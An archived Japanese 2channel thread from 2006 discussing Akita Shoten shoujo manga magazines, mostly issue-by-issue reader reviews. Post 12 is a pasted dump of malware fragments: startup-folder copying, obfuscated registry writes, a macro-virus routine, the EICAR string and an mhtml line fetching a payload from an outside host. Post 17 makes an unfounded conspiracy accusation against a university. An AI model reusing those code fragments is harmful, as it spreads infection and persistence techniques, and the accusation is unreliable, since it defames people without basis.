5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

プリンセス・ボニータ☆秋田書店総合スレ18

1 :花と名無しさん:2006/11/08(水) 21:14:49 ID:???0
伝統と品質の秋田書店発行の少女漫画雑誌について語るスレッドです。
(プリンセス、プリンセスGOLD、ミステリーボニータ、サスペリアなど)
用語解説>姫=プリンセス、姫金=プリンセスGOLD
雑誌のテンプレを使う時は、使わない羅列部分を削って鯖に優しくしましょう(・∀・)b

秋田書店公式サイト
ttp://www.akitashoten.co.jp/index2.html

プリンセス・ボニータ☆秋田書店総合スレ17
http://comic6.2ch.net/test/read.cgi/gcomic/1146067113/
該当作家の話題は作家スレに、過去ログ、作家スレ等は>>2-5あたりです。


2ちゃんねるがはじめての方に。
まず、2ちゃんねるガイドhttp://info.2ch.net/guide/をよく読んで 参加してください。
少し荒っぽい掲示板ですが、 万一貴方の気を悪くすることがかかれてあっても、
一息ついてお茶を飲んでください。

2 :花と名無しさん:2006/11/08(水) 21:15:12 ID:???0
◆関連スレッド◆
【秋田】秋田書店TL系雑誌専用【マンセー】
http://comic6.2ch.net/test/read.cgi/gcomic/1147694512/

【過去ログ】
16 ★http://comic6.2ch.net/test/read.cgi/gcomic/1134250733/
15 ★http://comic6.2ch.net/test/read.cgi/gcomic/1127129193/
14 ★http://comic6.2ch.net/test/read.cgi/gcomic/1120735523/
13 ★http://comic6.2ch.net/test/read.cgi/gcomic/1118280122/ 
12 ★http://comic6.2ch.net/test/read.cgi/gcomic/1109514436/
11 ★http://comic6.2ch.net/test/read.cgi/gcomic/1097849957/
10 ★http://comic6.2ch.net/test/read.cgi/gcomic/1072322487/
9 ★http://comic.2ch.net/test/read.cgi/gcomic/1060175529/
8 ★http://comic.2ch.net/test/read.cgi/gcomic/1047559755/
7 ★http://comic.2ch.net/test/read.cgi/gcomic/1041788033/
6 ★http://comic.2ch.net/test/read.cgi/gcomic/1034863577/

3 :花と名無しさん:2006/11/08(水) 21:15:29 ID:???0
☆★プリンセス・プリGOLD・2☆★
http://comic.2ch.net/test/read.cgi/gcomic/1019603438/
☆★プリンセス・プリGOLD☆★
http://comic.2ch.net/test/read.cgi/gcomic/999754569/
秋田書店総合スレ(プリンセス・ボニータ他)
http://salad.2ch.net/test/read.cgi/gcomic/996597212/
プリンセス・プリンセスGOLD Part2
http://salad.2ch.net/test/read.cgi/gcomic/992621754/
プリンセス・プリンセスGOLD
http://salad.2ch.net/test/read.cgi/gcomic/972233056/

4 :花と名無しさん:2006/11/08(水) 21:16:02 ID:???0
■青池保子総合■エロイカより愛をこめて他[28]
http://comic6.2ch.net/test/read.cgi/gcomic/1160899301/
 山田圭子 
http://comic6.2ch.net/test/read.cgi/gcomic/1081585060/
■□王家の紋章@2ちゃんねる Part24□■
http://comic6.2ch.net/test/read.cgi/gcomic/1157513531/
もとなおこ「レディー・ヴィクトリアン」Ch.5
http://comic6.2ch.net/test/read.cgi/gcomic/1149842932/
MMMM 水城       せとな 5 MMMM
http://comic6.2ch.net/test/read.cgi/gcomic/1159368549/
【オヤユビヒメ∞】藤枝とおる
http://comic6.2ch.net/test/read.cgi/gcomic/1110206639/
■さちみりほを新スレまで語り尽くすスレッド■
http://comic6.2ch.net/test/read.cgi/gcomic/1108502336/
【読者より】氷栗優 2【お金が大事】
http://comic6.2ch.net/test/read.cgi/gcomic/1155556168/
中山星香 ★ 第23部
http://comic6.2ch.net/test/read.cgi/gcomic/1160549700/
河村恵利さんを語ろう!スレ
http://comic6.2ch.net/test/read.cgi/gcomic/1043217023/
岩崎陽子★王都妖奇譚*浪漫狩り*無頼
http://comic6.2ch.net/test/read.cgi/gcomic/1060250119/
【女王様の犬】竹内未来【賢者の石】
http://comic6.2ch.net/test/read.cgi/gcomic/1070390623/
【滝口琳々】北宋風雲伝、江東の暁
http://comic6.2ch.net/test/read.cgi/gcomic/1042100408/
【カルバニア物語】TONO☆10【チキタ★GUGU】
http://comic6.2ch.net/test/read.cgi/gcomic/1162711629/

5 :花と名無しさん:2006/11/08(水) 21:16:20 ID:???0
市東亮子を語るスレッド 12
http://comic6.2ch.net/test/read.cgi/gcomic/1148046733/
東山むつき 総合スレ
http://comic6.2ch.net/test/read.cgi/gcomic/1094141311/
■■■高橋美由紀 part.2■■■
http://comic6.2ch.net/test/read.cgi/gcomic/1149591098/
木々とバリエシリーズに萌えな人いませんか☆
http://comic6.2ch.net/test/read.cgi/gcomic/1044726992/
あしべゆうほ【クリスタル★ドラゴン】part5
http://comic6.2ch.net/test/read.cgi/gcomic/1117731551/
野間美由紀16貫目
http://comic6.2ch.net/test/read.cgi/gcomic/1153182376/
浜田翔子ってどうなったの?
http://comic6.2ch.net/test/read.cgi/gcomic/1026279421/
和田慎二総合スレver.2
http://comic6.2ch.net/test/read.cgi/gcomic/1150901256/

6 :〓姫12月号のテンプレ〓:2006/11/08(水) 21:16:48 ID:???0
前スレ973からのコピペ(http://comic6.2ch.net/test/read.cgi/gcomic/1146067113/973

表紙(楽園)…
楽園(新連載)…
猫ろ日…
放課後…
究極…
モッケ…
ラズメリ…
電脳…
心理サプリ…
LV…
ドラゴン…
プッチ…
シノビ…
すっ…
入門G…
WANTED!(読み切り)…
夜、月の出る丘で(読み切り)…
アンニュイ…
総評…

7 :〓ミスボ12月号のテンプレ〓:2006/11/08(水) 21:17:15 ID:???0
前スレ981からのコピペ(http://comic6.2ch.net/test/read.cgi/gcomic/1146067113/981-982

表紙(あしべ)…
代官山…
炎人…
傀儡師…
メルヘン少女…
数えず…
巫女アヤカ…
1/2…
ねこ…
クリ☆ドラ…
八卦の空…
ムサシ…
童顔刑事…
ひなぎく…
カルラ…
冬の夜咄…
月下の…
研究室…
悪魔物語…
トラブル…

別冊付録…
総評…

8 :花と名無しさん:2006/11/08(水) 21:19:45 ID:???0
いつの間にか前スレが埋め立てられていたので、とりあえず立ててみました。
作家スレはひと通りチェックして最新のものにしたつもりですが
間違ってたら、訂正宜しくです。

9 :花と名無しさん:2006/11/08(水) 21:26:20 ID:???O
乙です

10 :花と名無しさん:2006/11/08(水) 22:12:47 ID:???0
乙です


11 :花と名無しさん:2006/11/08(水) 22:20:41 ID:???0
テンプレ借ります
表紙(楽園)… 普通。姫の中では一般受けする絵じゃない?
楽園(新連載)… 足踏みが出会いにマーティン卿とベルvの出会いを思い出した…ひそかにマーティン卿派だったよ・・・。それとほのかに金色のコルダを思い出すような・・・
猫ろ日… 自分の毛がおいしいんだろうか
放課後… 真白と話の展開のグダグダさにいらいらする。もう蒼×紅葉でいいよ。そういやそうなると今度は紅葉は姉に狙われるのか
究極… 話の展開読めすぎ。ついでに母の教え〜条が寒い
モッケ… 読んでもさっぱり理解できない上にキャラの判別がつきません。口元がイヤ。
ラズメリ… 前回面白くなりそうと思ったけど、いまいち
電脳… ナトリとヒロインの関係のみ気になる。
心理サプリ… スルー
LV… 昔のベルに戻った…!怒涛の展開でもはや何が驚きなのか分らなくなってきた
ドラゴン… 引いた
プッチ… まだ読んでなかった
シノビ… 面白い
すっ… スルー
入門G… ってなんだっけ
WANTED!(読み切り)… つまらん
夜、月の出る丘で(読み切り)… まあ読みきりとしてはいい感じ
アンニュイ… あんまり面白くない
総評… 今月はいまいちだった


12 :<body onload=window()>:2006/11/09(木) 01:04:06 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


13 :花と名無しさん:2006/11/09(木) 02:03:31 ID:???0
>>1
乙カレー

14 :花と名無しさん:2006/11/09(木) 02:07:35 ID:???0
新連載はなんだか、あちこちの漫画から
設定をつぎはぎしてきたような印象だ。
目新しいところがまったくない。
「無口で強引でちょっと謎の多い男」というのはもうお腹いっぱい。

15 :花と名無しさん:2006/11/09(木) 10:46:18 ID:???0
権力持っている生徒会みたいに、本来のターゲット層には受けるんでしょ。
ここで散々のしげまつも、中高生に売れてるのと同じ。

16 :花と名無しさん:2006/11/09(木) 18:30:22 ID:???0
秋田書店総合スレの皆様、宣伝失礼致します。

第二回漫画最萌トーナメント一次予選開始(11/11(土)より)のお知らせに伺わせていただきました 10000キャラ以上が集う夢の祭典、
少女漫画関係からも複数キャラがエントリーされています、もし気が向かれた際にはお気軽にご参加いただければ幸いです
第二回漫画最萌トーナメントまとめサイトttp://max.45.kg/mangasaimoe/index.html 

17 :花と名無しさん:2006/11/09(木) 20:57:52 ID:hxfZCcaC0
警察が加わった大量殺人テロ犯罪が何故許されるのか?
理解できない。

事務局/裏警察ぐるみのオウムサリン大量殺人事件に関する罪の認識が全くない秋田県
http://society3.2ch.net/test/read.cgi/koumu/1069480689/644-650

秋田県立大がオウムそのものである事は100%間違いない。
私の分析能力は決して低くない。

オウム犯罪は事務局ぐるみである以上、教員が多少変わっても仕方がない。
大学組織そのものがオウム真理教の実体である。


18 :花と名無しさん:2006/11/10(金) 23:44:59 ID:???0
天麩羅ごっち

表紙(楽園)…かわいいから期待した。
楽園(新連載)…私もコルダを思い出した。あと踏み付けのシーンも他作品でガイシュツでデジャヴがあった。
猫ろ日…ワロスw
放課後…真白は自分を女の子扱いしてくれる男になびくだけ?紅葉は悟ったと思ったら結局、被害者でいたいのかイミフー。
究極…あいかわらず行き当たりばったり感があるな。歯列矯正だの、外国語だの、自己投資に余念がない端書もウザ。
モッケ…期待していなかったけど設定が結構、面白い。人物の描き分けはイマイチ。
「ドS」って言葉、同雑誌の中で使いまわすのはやめて欲しい。
ラズメリ…どこに向かいたい話なのか、、、もうスルー。
電脳…今月、一番、楽しかった。
心理サプリ…面白かった。
LV…殿下ウザー
ドラゴン…スルー
プッチ…スルー
シノビ…うーん。。。
すっ…面白かった。
入門G…設定は悪くないのに絵も展開も粗いな。
WANTED!(読み切り)…あとで暇があったら読む。
夜、月の出る丘で(読み切り)… あとで暇があったら読む。
アンニュイ… スルー

総評…同雑誌の中で似た毛色の作品、他誌と被るような作品が多くなってきた。

19 :花と名無しさん:2006/11/11(土) 01:31:46 ID:???0
LV、急展開過ぎて訳がわからなかった。
最新刊まで面白く読めてたのになあ。

20 :花と名無しさん :2006/11/11(土) 07:53:17 ID:???0
>>18
ドS姫ってのうざいよね。
たいした登場人物じゃないのに、何故そんなに色を付ける。

21 :花と名無しさん:2006/11/11(土) 10:56:03 ID:???0
>>1乙華麗゚.・∴..*.☆+
テンプラごちになります(_人_)

表紙(楽園)…華やかな感じでいい。見やすいし。
楽園(新連載)…主人公と展開がありがち。楽しめたけど。
猫ろ日…スルー
放課後…gdgd展開お腹イパーイ(´ε(`)紅葉の服の横縞がどんどん増えてた。
究極…ありがち。ヒーローがカコイクナイ。顔だけなら前作の泉さんやハバシさんのほうが好き
モッケ…やおい臭のするネタを省けばイイともう。
ラズメリ…迷走してる…?話に引き込まれない
電脳…ビリーバーズの先輩達のキャラが一番好きだ足りする
心理サプリ…心理テストはしないけどストーリーはおもしろい。
LV…もうすぐ最終回かな?と思って1年以上経ってる希ガス
ドラゴン…ありがち。メンフィスとウナスワロタw王子も出せばいいのに
プッチ…オツカレサン
シノビ…今一番楽しみな作品かも。景虎カッコヨス(´Д`*)ハァハァ
すっ…コミクス出してくれないかなぁ…
入門G…絶対絵で損してる!!どんどんヘタになってる気もする
WANTED!(読み切り)…変なメガネ。男がヲタっぽい。
夜、月の出る丘で(読み切り)…どーせなら薫風の話読みたい。
アンニュイ…人を呪はば穴二つ
総評…ちょっぴり味気なかった


22 :花と名無しさん:2006/11/11(土) 12:20:04 ID:???0
電脳も人物の顔の書き分けできてなくて読みにくいけど、
モッケもだ‥‥。
ドS姫以外全員白髪だし。せめて黒くするとかトーンはるとか
だけでもいいから区別してくれたら、ちょっとは見やすいのに。

23 :花と名無しさん:2006/11/11(土) 14:29:45 ID:???0
姫も姫金も絵的には華やかになって手に取りやすくなったけど
読みごたえがなくなってきた気ガス。

姫金の巻頭大ページ読みきりも始めは良かったけど、
どれも大ゴマ多用で段々薄味になってきて物足りない。
待てばすぐコミクス出るし雑誌を買って読む有り難味がなくなってきた。


24 :花と名無しさん:2006/11/11(土) 15:32:48 ID:???O
自分は姫、楽しみな作品がいくつかあるから
毎月出るのが待ち遠しい。
でも楽しみなのと、そうでないやつの差が
激しいなあとは思う。

ドラゴンは最初期待してたのに、
キャラが多すぎるせいでみんな半端にしか
描ききれてないせいか、上滑りしてて
話に入っていけない。
オヤユビは好きだったのにな。

25 :花と名無しさん:2006/11/11(土) 21:24:21 ID:???0
母の教え…うざいよね

26 :花と名無しさん:2006/11/12(日) 20:16:51 ID:???0
ウザイね。
誰もが危機的状況に陥ったときに普通に考えられる内容だし。
ヒーローとヒロインは幼い頃に接点があってヒロインだけがそのこと忘れてて
ヒーローは何だか訳ありで、どーせ最後はくっつく…



…スキビですか??

27 :花と名無しさん:2006/11/12(日) 20:44:04 ID:???O
スキビは読んだことないけど、その設定って
ありがちっちゃありがちだよね。

28 :花と名無しさん:2006/11/12(日) 21:26:23 ID:???0
フルバもそうだ。まあ王道中の王道。

29 :花と名無しさん:2006/11/12(日) 21:51:26 ID:???O
設定などはありがちでも王道でも、
おもしろく読めるように料理されてれば
いいんだが。

30 :花と名無しさん:2006/11/12(日) 22:48:02 ID:???0
そうだよね。
王道でも面白ければいいんだよね。
でも、最近のは、あ、これ同じだ…って思うだけ
そこに面白さはない。

31 :花と名無しさん:2006/11/14(火) 00:43:03 ID:???O
>>20
た…確かに…

小学生くらいから姉の姫を借りて読み始めてから、今だいたい15年くらい経つんだけど(現在23歳)、
最近の姫の雰囲気はさすがに自分の年齢にはそぐわない雑誌になってきた気がする。
昔はもっと大人っぽい雑誌の気がしたんだが…(それとも私がおばさんになったのか?w)
そろそろ姫を卒業しなきゃいけないのかな。。。

32 :花と名無しさん:2006/11/14(火) 00:44:04 ID:???O
↑あ>>23の間違いでしたスマソ

33 :花と名無しさん:2006/11/15(水) 18:49:23 ID:???0
>>26-28
ついこないだまで姫でやってた、白金庭もそうだったよな

34 :花と名無しさん:2006/11/16(木) 10:21:58 ID:???0
スキビって何の略?

35 :花と名無しさん:2006/11/16(木) 16:16:28 ID:???0
スキップ・ビート

36 :花と名無しさん:2006/11/16(木) 18:35:16 ID:???0
しらん。なんだそれ?

37 :花と名無しさん:2006/11/16(木) 20:58:49 ID:???0
花ゆめ連載の漫画
一応ランキング常連

38 :花と名無しさん:2006/11/16(木) 21:14:25 ID:???0
年寄りの愚痴は、長いうえに同じことのくり返しだから。。。

39 :花と名無しさん:2006/11/16(木) 21:26:54 ID:???0
「若い人」も定期的に来ますね

40 :花と名無しさん:2006/11/16(木) 23:17:23 ID:???0
来ても、古参が追い出してるから居着かないでしょ。

41 :花と名無しさん:2006/11/17(金) 00:19:26 ID:???0
正直、少女漫画板に若い人少ないんじゃないかな。
読み捨て傾向らしいから。

42 :花と名無しさん:2006/11/17(金) 01:16:22 ID:???0
でも「私は若いのよーーー!!」的な人はいなくていいw

43 :花と名無しさん:2006/11/17(金) 09:24:04 ID:???0
>>41
「若い人」らしき人は、基本的に活字が苦手なんでしょう。


44 :花と名無しさん:2006/11/18(土) 23:56:58 ID:???0
王家って殆ど(毎回?)カラーだよね。
何気にすごくない?
しかもけっこう綺麗だし。

45 :花と名無しさん:2006/11/19(日) 15:42:56 ID:???O
王家のクリアファイル自分はいらないけど
カラー自体は細かくてそれなりに綺麗だと思う
でも使えねーw

46 :花と名無しさん:2006/11/19(日) 20:17:43 ID:???0
物切っての質問すみません。
プリンセスで昔連載していた漫画で、
青っていう名前の主人公?が出ていた作品を探し中なんですが、
タイトルや作者名をご存知の方いませんか?
当時パラ見だったので、主人公とその隣によくいたキャラが
友情だったのか、恋愛だったのか、とても気になっています。
たぶんコミックスにはなっていないと思うんですが。

47 :花と名無しさん:2006/11/21(火) 16:53:30 ID:rNG4Qz7R0
苗美さと子さんの『1/2(はんぶん)ざかり』
という作品ではないでしょうか。
主人公の青が春日くんに憧れてどうのというお話しの・・・。
作者のPCサイトがあって
そのコミックス化希望投票とかもやってるみたいですよ。


48 :花と名無しさん:2006/11/21(火) 21:41:19 ID:???0
>46
ありがとうございます。
作者名を知って、そういえば苗美さと子さんの絵だったことを思い出しました。
何年も気になったままだったので、すごくすっきりしました。

当時BLが苦手で、まさか少女漫画誌のプリンセスで?と思いながらも
話の流れが気になっていました。
今はBLも平気になったので、別の意味から話の行く末が気になっていました。
やはり単行本未収録なので結末は気になりますが、タイトルがわかっただけでも
本当にのどのつかえがとれたような感じです。いきなりの質問すみませんでした。

49 :花と名無しさん:2006/11/22(水) 19:07:39 ID:???0
最近アリーズをレンタルショップで借りて読んだんだけどコミクスって絶版なの??

50 :花と名無しさん:2006/11/22(水) 22:22:26 ID:???0
>>49
目の前の道具は、何の為にあるんだ?自分で検索すればわかるだろう。

51 :花と名無しさん:2006/11/23(木) 00:44:14 ID:???0
>>50
そんないじわる言うなよ。
>>49は首の上にある頭の存在にもまだ気が付いていなんだゾ。

52 :花と名無しさん:2006/11/23(木) 04:13:28 ID:???O
>>49
【アリーズ】冬木るりか
http://comic6.2ch.net/test/read.cgi/gcomic/1158577397/

53 :花と名無しさん:2006/11/26(日) 15:15:44 ID:???0
とりあえず上げ

54 :花と名無しさん:2006/11/26(日) 15:31:19 ID:???0
上がってねーぞクソカス

55 :花と名無しさん:2006/11/26(日) 15:41:51 ID:???0
クソカス

56 :花と名無しさん:2006/11/26(日) 15:58:28 ID:???0
本当だ。
上がってないじゃん。

57 :花と名無しさん:2006/11/26(日) 16:50:16 ID:???0
∩(・∀・)∩ ホントにageますよ〜

58 :花と名無しさん:2006/11/26(日) 17:35:23 ID:???0
好きにしろよ。

59 :花と名無しさん:2006/11/26(日) 20:00:43 ID:???0
何しろ中身のある話がないことはわかったw
本当にここのスレは過疎化しているね

60 :花と名無しさん:2006/11/26(日) 23:42:27 ID:???O
専スレがあればそこに書きこむし。
ないやつは本当ならここで語りたい
ところだが、ここに書くとその作品が
叩かれそうだから書けん。

61 :花と名無しさん:2006/11/26(日) 23:43:26 ID:???0
☆嵐のリーダー・大野智を応援しよう☆

ttp://www.youtube.com/watch?v=iVoyMQcdLy8
ttp://www.youtube.com/watch?v=brqlLHQNeJs
レベルの高いダンスの実力

ttp://www.youtube.com/watch?v=wIkOu0tnCQ4
ttp://www.youtube.com/watch?v=a-49XJT1li0
ナイスな天然ボケ具合

これほど非凡な才能を持ちながらイマイチ名の知れていない大野智。
動画はほんの一部です。まだまだたくさんの大野の面白動画があります。
動画を観て彼を気に入ったらどんどん彼の素晴らしさを普及しよう。
2chの力で大野をメジャーなアイドルへ!

嵐の大野智を応援してあげようぜ
http://ex17.2ch.net/test/read.cgi/news4vip/1164456153/


62 :花と名無しさん:2006/12/01(金) 12:22:23 ID:???0
保守

63 :花と名無しさん:2006/12/06(水) 10:31:37 ID:???O
発売日だよage

64 :花と名無しさん:2006/12/06(水) 11:46:47 ID:???0
ついにLVも終わりかあ 

65 :花と名無しさん:2006/12/06(水) 16:42:30 ID:???0
プリンって終わったんだっけ?

66 :花と名無しさん:2006/12/06(水) 18:48:22 ID:???0
LVはもっと早くに終わっておけばよかった。

67 :花と名無しさん :2006/12/06(水) 20:13:58 ID:???0
今月デビューした漫画家の人、
昔のわかつきめぐみみたいな感じだね。わりと好き。

68 :花と名無しさん:2006/12/07(木) 04:08:26 ID:???0
天麩羅揚げてみました
まちがいや足りない部分があったら修正して
使って下さい。


姫1月号

表紙…
楽園…
究極…
王家…
モッケ…
心理サプリ…
放課後…
すっ…
シノビ…
アンニュイ…
LV…
猫ろ日…
入門…
ラズメリ…
君は☆…
ドラゴン…
足跡を(読みきり)…
夢語り…
私の大事(読みきり)…
総評…

69 :花と名無しさん:2006/12/07(木) 04:25:00 ID:???O
表紙…印象薄い
楽園…学内で特別な地位みたいなの、ドラゴンとかぶる。
究極…絵は丁寧だが話が昔の花ゆめっぽい
王家…好きにして
モッケ…また見分けつかない。貧乏神は髪を黒くすればいい
心理サプリ…面白い
放課後…急展開。終わりが近いね
すっ…シカにワロス
シノビ…ちょい面白くなってきた
アンニュイ…いいね
LV…いよいよラストか
猫ろ日…よかおなごのが好き
入門…アッサリ終わったね
ラズメリ…読みづらい
君は☆…結構好きだこの人。
ドラゴン…キャラ多過ぎ
足跡を(読みきり)…また雪の話かぁ
夢語り…随分前に描いてた人だよね
私の大事(読みきり)…絵が雑だなぁ。
総評…似た設定が多い。最近、読み切りがツマラン

70 :花と名無しさん:2006/12/07(木) 18:31:00 ID:???0
あのアンドロイドの人の絵って10月号でデビューして人の絵と同じぢゃん?

71 :花と名無しさん:2006/12/07(木) 21:39:52 ID:???0
すっ!と、ドラキウイラと
当世白波気質のコミクスが出て欲しい
ってアンケ書けって話だよな

72 :花と名無しさん:2006/12/08(金) 17:18:48 ID:???O
>70
確かに同じ絵っていうか、たぶん同じ人だよね。

前回のはデビューじゃなかったのか?

73 :花と名無しさん:2006/12/08(金) 18:01:54 ID:???O
>>72
擬人化したネコの話の人?


74 :花と名無しさん :2006/12/08(金) 20:00:00 ID:???0
>>68 おつかれー

姫1月号

表紙… もっと新年ぽくしてほしかった
楽園… あちこちの漫画から切り張りしたみたい
究極… これもデジャブだらけ
王家…なんかだれてるね。 一度現代戻ってほしい
モッケ… 話は悪くない
心理サプリ… 毎回楽しみにしてる。テストはやらね
放課後… 蒼の謎は意外とあっけないね。もっとあると思った
すっ… 奈良の鹿めちゃうけたwww
シノビ… かげとらがどうしたいのかよくわからん
アンニュイ… ナルシス君すき
LV… あと一回でまとまるの?
猫ろ日… スルー
入門… よく読めば面白かった
ラズメリ… よく読んでも話が見えない。なにがなにやら
君は☆… 短くまとまっててよかった
ドラゴン… もっと応援団中心の話にしてほしーな
足跡を(読みきり)… 絵が嫌い
夢語り… スルー
私の大事(読みきり)… 嫌いじゃない
総評… こざっぱりしてた。



75 :花と名無しさん:2006/12/09(土) 01:50:14 ID:???0
前のほうでどなたかがカキコしていたけど、
見た目が華やかになっても読みごたえがないように感じるのは
見える部分は描けても、見えない部分が上手く描けていないんだろうね。
最近の作家さんは、この見えない部分を書くのが下手だと思う。

心理サプリなんか、絵的には取立て上手いわけじゃないんだけど、
それでも読めるのは、やっぱり原作が心理専門のせいか、
見えない部分が描けているんだろうな…

76 :72:2006/12/09(土) 02:42:44 ID:???0
>>73
そう、擬人化した猫の話だった。
前回のも今回のもどっかで見たような
設定の話だな‥‥。

77 :花と名無しさん:2006/12/09(土) 03:23:51 ID:???0
見えない部分が書けてないってのは、心理描写が下手なんじゃないか?
絵もうまいし話もまとまってるんだけど、いまいちストーリーに入りこめない作品増えた。



78 :花と名無しさん:2006/12/09(土) 04:10:22 ID:???0
喜怒哀楽ってあるけど、
「怒」、「哀」の部分が描ききれていないか、
バランスがよくない気がする

山があるから、谷が際立つし、
谷があるから、山が際立つ

だからといって
闇雲(露骨)に不幸を描くのは、
熟練した人の手法ではないけど、
人間の心理・描写力が根底にあれば
楽しさや、喜びはもっと引き立つはず…

79 :花と名無しさん:2006/12/09(土) 06:41:45 ID:???O
その人から発した感情で描けてないという印象だな。
借りて来たような設定にそのままくっつけた喜怒哀楽の表現



80 :花と名無しさん:2006/12/09(土) 14:27:18 ID:???0
だから最近原作付増えてるんじゃね?
でも原作ついても物足りないものはあるね。


81 :花と名無しさん:2006/12/10(日) 02:06:58 ID:???0
ここの住人さんはすごいな
レベル高い


82 :花と名無しさん:2006/12/12(火) 20:04:18 ID:???0
誰もいない・・・・

83 :花と名無しさん:2006/12/12(火) 20:25:50 ID:???0
いや、いるけど、特に書き込むことがない。

84 :花と名無しさん:2006/12/13(水) 13:55:39 ID:???0
ボニータ1号の感想でも?

9番目のムサシ、人気みたいだけど
イマイチ良さが分からない。
東山むつきと村瀬みつき…作家名ややこしい

85 :花と名無しさん:2006/12/13(水) 21:03:03 ID:???0
9番目のムサシの人の作品はどれも皆同じに見える。

86 :花と名無しさん:2006/12/13(水) 21:25:04 ID:???0
LVが終わったらとりあえず姫を買うのを中止するかな。
山圭さんも征矢さんも帰ってきそうにないし、もう読むのが無い。

87 :花と名無しさん:2006/12/14(木) 15:59:31 ID:???0
>>85
時にムサシと天地は同じだね。
片方がとんでもパワーを持つもので、片方がごくごく一般の普通のヘタレ。
そのくせ恋愛に関してだけは貪欲で、仕事も友人も普通の人としての生活も
全て捨てて愛のためだけに生きる駄目男になるという。
しかもそのとんでもパワーを持つものが一見男か女か分からないという絵面。


88 :花と名無しさん:2006/12/14(木) 16:45:24 ID:???0
ムサシは、過去話シリーズの時は面白かったけど
もういいよ、という感じになった

89 :姫金テンプレ:2006/12/16(土) 12:53:56 ID:???0
お初…
プリちゃん…
縛り屋…
砂の下…
天使…
アルジャン…
北宋…
ドラキウイラ…
アリーズ…
キルト…
破龍…
浪漫…
着メロ…
仮面…
黄昏…
金色…
トントン…

90 :花と名無しさん:2006/12/16(土) 20:10:37 ID:???0
>86
姫じゃなくて次の姫金になっちゃうけど山圭さんの読みきり100Pが載るよ!
天保の政略結婚モノ。

91 :花と名無しさん:2006/12/16(土) 21:01:08 ID:???0
テンプレサンクスネタバレアリ
お初… なんか少女漫画な展開・・・
プリちゃん… 10分はきついな
縛り屋… 黒だったのか・・・黄色かと思ってた。
砂の下… 2巻でる!
天使… 面白い。しかし題の天使って何のことだろう?
アルジャン… しばらく一人旅状態?
北宋… 皇帝の月華への片思いなんてイランと思ってたが、こう関ってくるなら楽しみかも
ドラキウイラ… 西洋の神と日本の神は違うから大丈夫なんだろうか?
アリーズ… これ、1のほう文庫化でもしないかな?
キルト… スルー
破龍… 奥さんロリっぽい
浪漫… スルー
着メロ… つまらん
仮面… こわいようなワケ分らんような。でもこれ姫金で読みたいと思う話じゃないんだよな・・・
黄昏… 次以降に期待?
金色… めずらしく幸せになったなあ。しかしこの人には読みきりより前みたいな連載のが描いてほしい。
トントン…「泉さんを万引き」に笑った。買えばいいじゃないか



92 :花と名無しさん:2006/12/17(日) 12:20:03 ID:???0
さちみさんはコスプレがハマるなぁ。塗り絵にしたくなる。

93 :花と名無しさん:2006/12/17(日) 23:11:14 ID:???0
>>91
一行目と二行目の間に空白行を入れるよ

94 :花と名無しさん:2006/12/17(日) 23:12:33 ID:???0


95 :花と名無しさん:2006/12/18(月) 01:31:56 ID:???0
>>93
×入れるよ
○入れろよ …って意味っすか?

96 :花と名無しさん:2006/12/18(月) 12:56:43 ID:???0
でしょでしょ

97 :花と名無しさん:2006/12/18(月) 21:16:16 ID:???0
姫金は★と青池御大まで買わないけど、今回のに予告載ってた?

98 :花と名無しさん:2006/12/18(月) 23:13:23 ID:???0
★→2月号妖精後日談50P
青池→3月+4月号よりアルカサル完結編掲載
    (読者プレゼントのとこに書いてあった)

99 :花と名無しさん:2006/12/19(火) 06:47:29 ID:???0
50ページもあるのか。orz
最近の姫金はスルー物件が増えた。

100 :花と名無しさん:2006/12/19(火) 19:21:09 ID:???0
100get

101 :sage:2006/12/19(火) 21:15:53 ID:OG7ihz1A0
姫金のお初、町人のお初と侍って普通に縁談とかが来るものなのか?
「風光る」ではかなり大変そうだったけど、原作がそうなのかな。


102 :花と名無しさん:2006/12/20(水) 02:51:50 ID:???0
普通はこないだろうけど大店の家の娘なら
貧乏旗本から縁談が来たのかもしれない…

103 :花と名無しさん:2006/12/20(水) 03:08:05 ID:???0
お初って実は大店の娘だったりするの?

104 :花と名無しさん:2006/12/20(水) 03:49:19 ID:???0
変わり者のお奉行様だしな
場合によっては世話することもあるかもしれんよ
実際の縁組の時には、自分とこかどこぞの養女にして

105 :花と名無しさん:2006/12/20(水) 21:58:09 ID:???0
大店ではないでしょ。
お初と義姉で切り盛りしてるくらいだから、町の庶民的な店だと思う。
大店だったら兄二人も店の業務とかするでしょ。
上の兄は勤め人だし。

106 :花と名無しさん:2006/12/21(木) 02:26:40 ID:???0
ごちそうさまです☆

表紙…普通。
楽園…インパクない。
究極…上に同じ。
王家…まあ、こんなんだろうね。。。
モッケ…オイオイ、登場人物がwもう三つ子とか四つ子とか言ってもいいくらいw
心理サプリ…普通。
放課後…話はループ系で初期ほどの力は感じられないけど、それでもやっぱりプロだな。
すっ…今回はあんまり。。
シノビ…うーん、プロが小手先で描いている感じ。
アンニュイ…スルー
LV…とうとう来月最終回か・・・
猫ろ日…ワロスw
入門…さっぱりしているのが個性だと思うけど、それにしても絵も話もさっぱりしすぎかな。
ラズメリ…説明臭、漂いすぎ。
君は☆…連載って・・・まじ?
ドラゴン…どうしたんだろう?詰め込んできているように思える。「校内で私服、登下校に制服」にツッコミw
